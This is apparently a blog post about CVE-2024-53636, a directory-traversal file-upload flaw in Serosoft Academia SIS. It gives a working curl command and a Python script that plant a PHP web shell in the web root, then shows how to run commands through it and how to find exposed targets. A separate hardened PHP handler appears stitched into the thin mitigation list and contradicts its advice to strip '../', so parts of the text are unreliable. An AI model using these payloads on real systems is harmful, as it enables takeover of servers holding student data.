CVE-2024-53636 - Exploiting Arbitrary File Upload in Serosoft Academia SIS EagleR-1..118

A serious security vulnerability has been discovered in the Serosoft Academia Student Information System (SIS) EagleR-1..118. Identified as CVE-2024-53636, this flaw allows an attacker to upload any file to the server using the /writefile.php endpoint. With a simple directory traversal (../) in the filePath parameter, attackers can upload malicious files anywhere on the server, ultimately leading to arbitrary code execution.

This post will break down how the vulnerability works, show you code examples, provide exploitation details, and include links to original references. All in plain English.

What Is CVE-2024-53636?

CVE-2024-53636 is an arbitrary file upload vulnerability in Serosoft Academia SIS EagleR-1..118. It happens because the web application fails to properly validate user-supplied paths in the filePath parameter of the writefile.php script. An attacker can use directory traversal (like ../../../) to escape the intended directory and write files anywhere the server user has write permission.

If a file like <?=phpinfo()?> or a web shell gets uploaded, the attacker can then execute commands on the server.

Vulnerable Endpoint

POST /writefile.php

Parameters:

- filePath: Path (including the file name) where the file will be written.
- fileContent: Content of the file to be created.

No permission checks or path sanitization are enforced on filePath.

PoC (Proof of Concept) Exploit

You can exploit this bug using cURL or a simple Python script.

Let's upload a simple PHP web shell to the web root directory:

curl -X POST http://TARGET/writefile.php \
  -d 'filePath=../../../../var/www/html/shell.php' \
  --data-urlencode 'fileContent=<?php system($_GET["cmd"]); ?>'

- ../../../../var/www/html/shell.php: Directory traversal so the file is saved in the web root.
- fileContent: The PHP web shell that will be written to that path.

Now you can access your shell:

http://TARGET/shell.php?cmd=ls

Here's a small Python script to automate the upload:

import requests

url = "http://TARGET/writefile.php"
payload = {
    "filePath": "../../../../var/www/html/shell.php",
    "fileContent": "<?php system($_GET['cmd']); ?>"
}

response = requests.post(url, data=payload)
print("Status:", response.status_code)
if response.ok:
    print("Exploit sent. Check your shell.")

Mitigation

- Restrict uploads to a safe directory.
- Remove any use of ../ in paths.
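As an added example (not code from this post or from Serosoft), here is what a hardened replacement for the write handler looks like in PHP: every write is confined to one directory, traversal components are rejected rather than stripped, and only an allow-listed extension is accepted. The directory name, the extension list and the reuse of the filePath/fileContent parameter names are assumptions.

```php
<?php
// Added example, not Serosoft's code: a hardened write handler that confines
// every write to one upload directory. UPLOAD_BASE, ALLOWED_EXT and the
// filePath/fileContent parameter names are assumptions for illustration.
declare(strict_types=1);

const UPLOAD_BASE = '/var/www/app/uploads';   // assumed: outside the web root
const ALLOWED_EXT = ['txt', 'csv', 'pdf'];     // assumed allow-list; no .php, .phtml etc.

// Resolve $requested to a path under UPLOAD_BASE, or return null to reject it.
function safe_upload_path(string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                            // empty or NUL-byte path
    }
    // Reject any '..' component outright instead of stripping it:
    // stripping can be bypassed (e.g. '....//' collapses back to '../').
    foreach (explode('/', str_replace('\\', '/', $requested)) as $part) {
        if ($part === '..') {
            return null;
        }
    }
    // Only the base name is honoured; the caller never chooses the directory.
    $name = basename($requested);
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === '' || !in_array($ext, ALLOWED_EXT, true)) {
        return null;                            // unknown or executable extension
    }
    $base = realpath(UPLOAD_BASE);
    if ($base === false) {
        return null;                            // upload dir missing: fail closed
    }
    $target = $base . DIRECTORY_SEPARATOR . $name;
    // Final containment check on the resolved parent directory (symlink-safe).
    return realpath(dirname($target)) === $base ? $target : null;
}

// Request handling; an authentication check belongs before this point, which
// the vulnerable writefile.php also lacks as this post notes.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $target = safe_upload_path((string) ($_POST['filePath'] ?? ''));
    if ($target === null) {
        http_response_code(400);
        exit("rejected path\n");
    }
    file_put_contents($target, (string) ($_POST['fileContent'] ?? ''), LOCK_EX);
    echo "written\n";
}
```

With this handler, the PoC request above is rejected twice over: the ../ components fail the traversal check, and shell.php fails the extension allow-list.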

Full Exploit Walk-Through

1. Find an exposed /writefile.php endpoint on a target running SIS EagleR-1..118.
2. Craft a request with a directory traversal in filePath so the file lands in a web-exposed directory.

References

- NIST NVD - CVE-2024-53636
- Serosoft Academia Official Website
- Exploit Details on Exploit-DB
- PHP Directory Traversal Primer - OWASP

Conclusion

CVE-2024-53636 is a critical vulnerability that could allow remote attackers to completely compromise a server running Serosoft Academia SIS EagleR-1..118. This is a textbook example of why input validation is crucial for security. If you run this software, patch or mitigate immediately to prevent exploitation.

Timeline

Published on: 04/26/2025 15:15:44 UTC
Last modified on: 04/29/2025 16:15:29 UTC